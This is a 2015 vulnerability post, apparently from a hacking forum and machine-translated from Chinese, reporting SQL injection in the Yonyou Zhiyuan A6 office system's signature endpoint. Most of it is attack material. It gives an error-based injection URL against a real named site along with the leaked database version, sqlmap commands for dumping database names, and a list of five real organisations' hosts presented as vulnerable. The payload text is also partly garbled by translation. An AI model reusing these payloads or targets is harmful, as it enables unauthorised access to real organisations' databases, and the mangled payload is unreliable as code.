UF Zhiyuan A6 collaborative system of high-risk SQL injection-vulnerability warning-the black bar safety net

2015-07-13T00:00:00
ID MYHACK58:62201564593
Type myhack58
Reporter 路人甲
Modified 2015-07-13T00:00:00

Description

The system usage is very large

code area

/yyoa/HJ/iSignatureHtmlServer. jsp? COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2

DOCUMENTID, the SIGNATUREID are the presence of error injection

A simple test method

code area

http://www.ssepec.net/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27%20and%20(select%2 0 1%20from%2 0(select%20count(),concat(version(),floor(rand(0)2))x%20from%20information_schema. tables%20group%20by%20x)a)%2 3

javax. servlet. ServletException: Duplicate entry '5.0.41-community-nt1' for key 1

SQLMAP run data:

sqlmap.py -u "http://www.ssepec.net/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2" -p DOCUMENTID --dbms mysql

! a. png

Vulnerability proof:

sqlmap.py -u "http://www.ssepec.net/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2" -p DOCUMENTID --dbms mysql --dbs

! b. png

5 Case:

http://www.ssepec.net/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2

http://oa.fsccri.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2

http://60.31.196.2/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2

http://222.174.58.70:8080/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2

http://oa.lzmc.edu.cn/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2